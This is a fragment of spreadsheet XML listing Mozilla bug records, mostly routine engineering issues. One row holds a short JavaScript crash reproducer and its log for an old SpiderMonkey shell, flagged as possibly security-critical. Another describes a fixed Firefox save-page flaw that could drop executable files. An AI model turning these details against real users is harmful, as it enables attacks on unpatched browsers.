      <c r="J4077" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4077" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4077" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4077" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4077" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4077" t="inlineStr">
        <is>
          <t>[nsbeta3-][rtm++]</t>
        </is>
      </c>
      <c r="Q4077" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4077" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4077" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T4077" t="n">
        <v>1</v>
      </c>
      <c r="U4077" t="n">
        <v>0</v>
      </c>
      <c r="V4077" t="n">
        <v>14</v>
      </c>
      <c r="W4077" t="inlineStr">
        <is>
          <t>Assigning to mscott based on CVS blame.
There are a number of talkback reports of crashes at
nsExternalHelperAppService::FillTopLevelProperties .  Some, but not all, of the
user comments mention downloading a PDF file.  The crash seems to occur here:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/uriloader/exthandler/nsExternalHelperAppService.cpp&amp;rev=1.31&amp;mark=281#271
Perhaps there are cases where a literal is not an element, and the QI returns
null?
See bug 42408 for other comments and
http://www.mozilla.org/projects/seamonkey/reports/ns6analysis.html or
n.p.m.crash-data for talkback data.</t>
        </is>
      </c>
      <c r="X4077" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4078">
      <c r="A4078" t="n">
        <v>1034230</v>
      </c>
      <c r="B4078" t="inlineStr">
        <is>
          <t>2014-07-03 11:59:55 -0700</t>
        </is>
      </c>
      <c r="C4078" t="inlineStr">
        <is>
          <t>[cairo] Potential use of uninitialized |stack| in cairo_type1_font_subset_look_for_seac</t>
        </is>
      </c>
      <c r="D4078" t="inlineStr">
        <is>
          <t>2018-07-06 11:43:46 -0700</t>
        </is>
      </c>
      <c r="E4078" t="n">
        <v>1</v>
      </c>
      <c r="F4078" t="n">
        <v>1</v>
      </c>
      <c r="G4078" t="n">
        <v>3</v>
      </c>
      <c r="H4078" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4078" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4078" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4078" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4078" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4078" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4078" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4078" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4078" t="inlineStr">
        <is>
          <t>[CID 749688][adv-main33+]</t>
        </is>
      </c>
      <c r="Q4078" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4078" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4078" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T4078" t="n">
        <v>1</v>
      </c>
      <c r="U4078" t="n">
        <v>0</v>
      </c>
      <c r="V4078" t="n">
        <v>7</v>
      </c>
      <c r="W4078" t="inlineStr">
        <is>
          <t>In  |cairo_type1_font_subset_look_for_seac| under case TYPE1_CHARSTRING_COMMAND_SEAC |stack[3]| and |stack[4]| are accessed with no guarantee they are initialized.
http://dxr.mozilla.org/mozilla-central/source/gfx/cairo/cairo/src/cairo-type1-subset.c#842,873,877</t>
        </is>
      </c>
      <c r="X4078" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4079">
      <c r="A4079" t="n">
        <v>1367046</v>
      </c>
      <c r="B4079" t="inlineStr">
        <is>
          <t>2017-05-23 06:20:28 -0700</t>
        </is>
      </c>
      <c r="C4079" t="inlineStr">
        <is>
          <t>Stop reducing the location and search bars' opacity for lightweight themes</t>
        </is>
      </c>
      <c r="D4079" t="inlineStr">
        <is>
          <t>2017-05-28 03:20:56 -0700</t>
        </is>
      </c>
      <c r="E4079" t="n">
        <v>1</v>
      </c>
      <c r="F4079" t="n">
        <v>1</v>
      </c>
      <c r="G4079" t="n">
        <v>2</v>
      </c>
      <c r="H4079" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4079" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4079" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K4079" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4079" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4079" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4079" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4079" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4079" t="inlineStr">
        <is>
          <t>[photon-visual][p1][57]</t>
        </is>
      </c>
      <c r="Q4079" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4079" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4079" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4079" t="n">
        <v>1</v>
      </c>
      <c r="U4079" t="n">
        <v>0</v>
      </c>
      <c r="V4079" t="n">
        <v>5</v>
      </c>
      <c r="W4079" t="inlineStr">
        <is>
          <t>This is obsolete with the photon design: http://searchfox.org/mozilla-central/rev/6c2dbacbba1d58b8679cee700fd0a54189e0cf1b/browser/themes/osx/browser.css#69-72</t>
        </is>
      </c>
      <c r="X4079" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4080">
      <c r="A4080" t="n">
        <v>1414352</v>
      </c>
      <c r="B4080" t="inlineStr">
        <is>
          <t>2017-11-03 10:45:56 -0700</t>
        </is>
      </c>
      <c r="C4080" t="inlineStr">
        <is>
          <t>Create new ping type for mobile metrics</t>
        </is>
      </c>
      <c r="D4080" t="inlineStr">
        <is>
          <t>2022-07-26 12:19:37 -0700</t>
        </is>
      </c>
      <c r="E4080" t="n">
        <v>1</v>
      </c>
      <c r="F4080" t="n">
        <v>1</v>
      </c>
      <c r="G4080" t="n">
        <v>2</v>
      </c>
      <c r="H4080" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4080" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J4080" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4080" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4080" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4080" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4080" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4080" t="inlineStr"/>
      <c r="Q4080" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4080" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4080" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4080" t="n">
        <v>1</v>
      </c>
      <c r="U4080" t="n">
        <v>0</v>
      </c>
      <c r="V4080" t="n">
        <v>4</v>
      </c>
      <c r="W4080" t="inlineStr">
        <is>
          <t>This will be a new element: Map&lt;String, Int&gt;, since it will mostly just be used for counting usage of components and features.</t>
        </is>
      </c>
      <c r="X4080" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4081">
      <c r="A4081" t="n">
        <v>457521</v>
      </c>
      <c r="B4081" t="inlineStr">
        <is>
          <t>2008-09-28 02:57:00 -0700</t>
        </is>
      </c>
      <c r="C4081" t="inlineStr">
        <is>
          <t>Crash [@ js_DecompileValueGenerator]</t>
        </is>
      </c>
      <c r="D4081" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E4081" t="n">
        <v>1</v>
      </c>
      <c r="F4081" t="n">
        <v>1</v>
      </c>
      <c r="G4081" t="n">
        <v>3</v>
      </c>
      <c r="H4081" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4081" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4081" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4081" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4081" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4081" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4081" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4081" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4081" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q4081" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4081" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4081" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4081" t="n">
        <v>1</v>
      </c>
      <c r="U4081" t="n">
        <v>0</v>
      </c>
      <c r="V4081" t="n">
        <v>24</v>
      </c>
      <c r="W4081" t="inlineStr">
        <is>
          <t>Created attachment 340781
crash log
this.__defineSetter__("x", [,,,].map)
this.watch("x", (new Function("var y, eval")))
x = true
crashes at 0x00000000fffffffc for opt and asserts debug shell on Mac 10.5.5. This occurs for both trunk and tracemonkey shells.
Console output for tracemonkey shell:
$ ./js-dbg-tm-intelmac 
js&gt; this.__defineSetter__("x", [,,,].map)
js&gt; this.watch("x", (new Function("var y, eval")))
js&gt; x = true
Assertion failure: (size_t) (regs-&gt;sp - stackBase) &lt;= StackDepth(script), at jsopcode.cpp:4988
Trace/BPT trap
$ ./js-opt-tm-intelmac 
js&gt; this.__defineSetter__("x", [,,,].map)
js&gt; this.watch("x", (new Function("var y, eval")))
js&gt; x = true
Segmentation fault
===
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x00000000fffffffc
Crashed Thread:  0
Thread 0 Crashed:
0   js-opt-tm-intelmac            	0x00059139 js_DecompileValueGenerator + 229
1   js-opt-tm-intelmac            	0x0001353f js_ReportValueErrorFlags + 55
2   js-opt-tm-intelmac            	0x0002cfca js_ReportIsNotFunction + 350
3   js-opt-tm-intelmac            	0x0002d06b js_ValueToFunction + 143
4   js-opt-tm-intelmac            	0x0002d0d6 js_ValueToFunctionObject + 84
Nominating security sensitive due to scary address of 0x00000000fffffffc.</t>
        </is>
      </c>
      <c r="X4081" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4082">
      <c r="A4082" t="n">
        <v>884234</v>
      </c>
      <c r="B4082" t="inlineStr">
        <is>
          <t>2013-06-18 03:39:31 -0700</t>
        </is>
      </c>
      <c r="C4082" t="inlineStr">
        <is>
          <t>Apps marked available Worldwide aren't available to Worldwide users</t>
        </is>
      </c>
      <c r="D4082" t="inlineStr">
        <is>
          <t>2013-06-25 09:12:07 -0700</t>
        </is>
      </c>
      <c r="E4082" t="n">
        <v>1</v>
      </c>
      <c r="F4082" t="n">
        <v>1</v>
      </c>
      <c r="G4082" t="n">
        <v>6</v>
      </c>
      <c r="H4082" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4082" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4082" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K4082" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L4082" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4082" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4082" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4082" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4082" t="inlineStr"/>
      <c r="Q4082" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4082" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4082" t="inlineStr">
        <is>
          <t>2013-06-27</t>
        </is>
      </c>
      <c r="T4082" t="n">
        <v>1</v>
      </c>
      <c r="U4082" t="n">
        <v>0</v>
      </c>
      <c r="V4082" t="n">
        <v>10</v>
      </c>
      <c r="W4082" t="inlineStr">
        <is>
          <t>I went to this app:
https://marketplace.firefox.com/app/free-sms/
with my profile location set to Worldwide and got an error.
The App is enabled for 'Worldwide' users, but not United States.</t>
        </is>
      </c>
      <c r="X4082" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4083">
      <c r="A4083" t="n">
        <v>1398946</v>
      </c>
      <c r="B4083" t="inlineStr">
        <is>
          <t>2017-09-11 14:37:18 -0700</t>
        </is>
      </c>
      <c r="C4083" t="inlineStr">
        <is>
          <t>remove fakedata generation code from setupdb_app</t>
        </is>
      </c>
      <c r="D4083" t="inlineStr">
        <is>
          <t>2017-12-08 11:30:29 -0800</t>
        </is>
      </c>
      <c r="E4083" t="n">
        <v>1</v>
      </c>
      <c r="F4083" t="n">
        <v>1</v>
      </c>
      <c r="G4083" t="n">
        <v>4</v>
      </c>
      <c r="H4083" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4083" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4083" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4083" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4083" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4083" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4083" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4083" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4083" t="inlineStr"/>
      <c r="Q4083" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4083" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4083" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4083" t="n">
        <v>1</v>
      </c>
      <c r="U4083" t="n">
        <v>0</v>
      </c>
      <c r="V4083" t="n">
        <v>5</v>
      </c>
      <c r="W4083" t="inlineStr">
        <is>
          <t>The setupdb app has a mode where it'll generate fake data. The way it works is by generating a bunch of random processed crash data for a non-existent product and then putting that in postgres. There's another script for syncing that data with Elasticsearch. Pretty sure this ignore S3.
Thus, fake data generation results in a state that's missing bits and who knows how that works in the webapp.
I think this code isn't really helpful anymore especially in light of improvements to the local dev environment.
This bug covers removing the setupdb app fake data generation code and the helper script for syncing it to Elasticsearch.</t>
        </is>
      </c>
      <c r="X4083" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4084">
      <c r="A4084" t="n">
        <v>1255456</v>
      </c>
      <c r="B4084" t="inlineStr">
        <is>
          <t>2016-03-10 08:28:22 -0800</t>
        </is>
      </c>
      <c r="C4084" t="inlineStr">
        <is>
          <t>Make the new Heroku MemCachier instances report to New Relic</t>
        </is>
      </c>
      <c r="D4084" t="inlineStr">
        <is>
          <t>2016-05-27 07:59:23 -0700</t>
        </is>
      </c>
      <c r="E4084" t="n">
        <v>1</v>
      </c>
      <c r="F4084" t="n">
        <v>1</v>
      </c>
      <c r="G4084" t="n">
        <v>7</v>
      </c>
      <c r="H4084" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4084" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4084" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K4084" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4084" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4084" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4084" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4084" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4084" t="inlineStr"/>
      <c r="Q4084" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4084" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4084" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4084" t="n">
        <v>1</v>
      </c>
      <c r="U4084" t="n">
        <v>0</v>
      </c>
      <c r="V4084" t="n">
        <v>4</v>
      </c>
      <c r="W4084" t="inlineStr">
        <is>
          <t>The MemCachier integration with New Relic isn't working for the new Heroku apps.
So I've filed:
https://memcachier.zendesk.com/requests/1358
"""
I've had New Relic reporting set up successfully for this Heroku app that uses the Memcachier addon:
https://analytics.memcachier.com/REDACTED
However, when I added the same New Relic license key to two new Heroku apps:
https://analytics.memcachier.com/REDACTED
https://analytics.memcachier.com/REDACTED
...I don't see any additional instance rows in the table on New Relic:
https://rpm.newrelic.com/accounts/677903/plugins/17846
...just the one existing "MemCachier Cache".
I'm guessing the problem is either:
(a) enabling the New Relic integration wasn't successful on those new instances, even though the Memcachier page confirmed the setting of the license key
(b) all of the Memcachier instances are reporting under the same "MemCachier Cache" name, thereby overwriting each other
"""</t>
        </is>
      </c>
      <c r="X4084" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4085">
      <c r="A4085" t="n">
        <v>1793551</v>
      </c>
      <c r="B4085" t="inlineStr">
        <is>
          <t>2022-10-03 23:54:27 -0700</t>
        </is>
      </c>
      <c r="C4085" t="inlineStr">
        <is>
          <t>Create arbitrary binary(.hta,.exe,.bat,.vb)/file when web page is downloaded/saved in firefox browser</t>
        </is>
      </c>
      <c r="D4085" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:13 -0700</t>
        </is>
      </c>
      <c r="E4085" t="n">
        <v>1</v>
      </c>
      <c r="F4085" t="n">
        <v>1</v>
      </c>
      <c r="G4085" t="n">
        <v>2</v>
      </c>
      <c r="H4085" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4085" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4085" t="inlineStr">
        <is>
          <t>Downloads Panel</t>
        </is>
      </c>
      <c r="K4085" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4085" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4085" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4085" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4085" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4085" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q4085" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4085" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4085" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T4085" t="n">
        <v>1</v>
      </c>
      <c r="U4085" t="n">
        <v>0</v>
      </c>
      <c r="V4085" t="n">
        <v>21</v>
      </c>
      <c r="W4085" t="inlineStr">
        <is>
          <t>Created attachment 9297079
index.html
## Products affected: 
Latest Firefox for Windows as on 04/10/22
### POC:
See this Video POC - https://youtu.be/5PBJ1MlikFk
1. Host malicious webpage (index.html) [See attached file].
2. Click save as to download the website to view offline or press (ctrl + s).
3. Save the file &amp; open downloaded file
### Impact
1. Create arbitrary files instead of html file, which might result in code execution when opened.
### Fix
1. Sanitize filename properly &amp; append .html to filename created from title tag by default as done by major browsers such as Google Chrome.</t>
        </is>
      </c>
      <c r="X4085" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4086">
      <c r="A4086" t="n">
        <v>1395743</v>
      </c>
      <c r="B4086" t="inlineStr">
        <is>
          <t>2017-08-31 15:37:33 -0700</t>
        </is>
      </c>
      <c r="C4086" t="inlineStr">
        <is>
          <t>Pocket button should come before bookmarks star button in urlbar</t>
        </is>
      </c>
      <c r="D4086" t="inlineStr">
        <is>
          <t>2017-10-09 06:19:23 -0700</t>
        </is>
      </c>
      <c r="E4086" t="n">
        <v>1</v>
      </c>
      <c r="F4086" t="n">
        <v>1</v>
      </c>
      <c r="G4086" t="n">
        <v>2</v>
      </c>
      <c r="H4086" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4086" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4086" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4086" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4086" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4086" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4086" t="inlineStr">
        <is>
          <t>[reserve-photon-structure]</t>
        </is>
      </c>
      <c r="Q4086" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4086" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4086" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4086" t="n">
        <v>1</v>
      </c>
      <c r="U4086" t="n">
        <v>0</v>
      </c>
      <c r="V4086" t="n">
        <v>10</v>
      </c>
      <c r="W4086" t="inlineStr">
        <is>
          <t>The Pocket button should come before the bookmarks star button in the urlbar.  Right now it's after.</t>
        </is>
      </c>
      <c r="X4086" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4087">
      <c r="A4087" t="n">
        <v>1146449</v>
      </c>
      <c r="B4087" t="inlineStr">
        <is>
          <t>2015-03-23 10:33:23 -0700</t>
        </is>
      </c>
      <c r="C4087" t="inlineStr">
        <is>
          <t>add "secret_bucket" variable to Terraform</t>
        </is>
      </c>
      <c r="D4087" t="inlineStr">
        <is>
          <t>2015-03-25 04:55:18 -0700</t>
        </is>
      </c>
      <c r="E4087" t="n">
        <v>1</v>
      </c>
      <c r="F4087" t="n">
        <v>1</v>
      </c>
      <c r="G4087" t="n">
        <v>4</v>
      </c>
      <c r="H4087" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4087" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4087" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K4087" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4087" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4087" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4087" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4087" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4087" t="inlineStr"/>
      <c r="Q4087" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4087" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4087" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4087" t="n">
        <v>1</v>
      </c>
      <c r="U4087" t="n">
        <v>0</v>
      </c>
      <c r="V4087" t="n">
        <v>2</v>
      </c>
      <c r="W4087" t="inlineStr">
        <is>
          <t>We need to add a "secret_bucket" variable to Terraform, to be passed to user-data through the ASG launch configuration (much like the puppet archive URL already).  This will primarily be used by Puppet to do Hiera lookups, but could easily be extended to other things, such as making the repository management workflow a little more simple.</t>
        </is>
      </c>
      <c r="X4087" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4088">
      <c r="A4088" t="n">
        <v>1240194</v>
      </c>
      <c r="B4088" t="inlineStr">
        <is>
          <t>2016-01-15 14:20:35 -0800</t>
        </is>
      </c>
      <c r="C4088" t="inlineStr">
        <is>
          <t>Pulling /repo/hg/version-control-tools on hgssh breaks replication</t>
        </is>
      </c>
      <c r="D4088" t="inlineStr">
        <is>
          <t>2016-02-08 15:17:10 -0800</t>
        </is>
      </c>
      <c r="E4088" t="n">
        <v>1</v>
      </c>
      <c r="F4088" t="n">
        <v>1</v>
      </c>
      <c r="G4088" t="n">
        <v>5</v>
      </c>
      <c r="H4088" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4088" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J4088" t="inlineStr">
        <is>
          <t>Mercurial: hg.mozilla.org</t>
        </is>
      </c>
      <c r="K4088" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4088" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4088" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4088" t="inlineStr"/>
      <c r="Q4088" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4088" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4088" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4088" t="n">
        <v>1</v>
      </c>
      <c r="U4088" t="n">
        <v>0</v>
      </c>
      <c r="V4088" t="n">
        <v>7</v>
      </c>
      <c r="W4088" t="inlineStr">
        <is>
          <t>Part of the Ansible deployment to hgssh does an hg pull into /repo/hg/version-control-tools. This pull is getting written to the replication log. Since /repo/hg/* isn't listed as a tracked path in the replication system, the consumers blow up due to encountering an unknown path.
There are several potential solutions to this:
a) Don't write replication events for `hg pull` operations
b) Don't write replication events for repo paths not tracked by the replication config
c) Consumers should ignore repo paths that aren't tracked by the replication config
d) Consumers should not blow up so hard when this type of event occurs
Currently, if you do a prod deploy you'll first get a bunch of Nagios alerts like:
hgweb9.dmz.scl3.mozilla.com:procs - hg vcsreplicator consumer is CRITICAL: PROCS CRITICAL: 7 processes with regex args
                     vcsreplicator-consumer (http://m.mozilla.org/procs+-+hg+vcsreplicator+consumer)
To restore service, run the following from a version-control-tools checkout:
  $ ansible hgweb-prod -i ansible/hosts -m shell -a '/repo/hg/venv_replication/bin/vcsreplicator-consumer /etc/mercurial/vcsreplicator.ini --partition 3 --skip'
  $ ansible hgweb-prod -i ansible/hosts -m shell -a 'supervisorctl start vcsreplicator:3'
This will invoke a consumer process that simply acks/skips the first bad message on partition 3, which /repo/hg/version-control-tools always maps to. Then, we start up the daemon process for partition 3 and everything should recover.</t>
        </is>
      </c>
      <c r="X4088" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4089">
      <c r="A4089" t="n">
        <v>760706</v>
      </c>
      <c r="B4089" t="inlineStr">
        <is>
          <t>2012-06-01 15:16:04 -0700</t>
        </is>
      </c>
      <c r="C4089" t="inlineStr">
        <is>
          <t>Kill /kb Survey</t>
        </is>
      </c>
      <c r="D4089" t="inlineStr">
        <is>
          <t>2012-06-05 05:49:03 -0700</t>
        </is>
      </c>
      <c r="E4089" t="n">
        <v>1</v>
      </c>
      <c r="F4089" t="n">
        <v>1</v>
      </c>
      <c r="G4089" t="n">
        <v>5</v>
      </c>
      <c r="H4089" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4089" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4089" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4089" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4089" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4089" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4089" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4089" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4089" t="inlineStr">
        <is>
          <t>u=sumo-team c=wiki p=1</t>
        </is>
      </c>
      <c r="Q4089" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
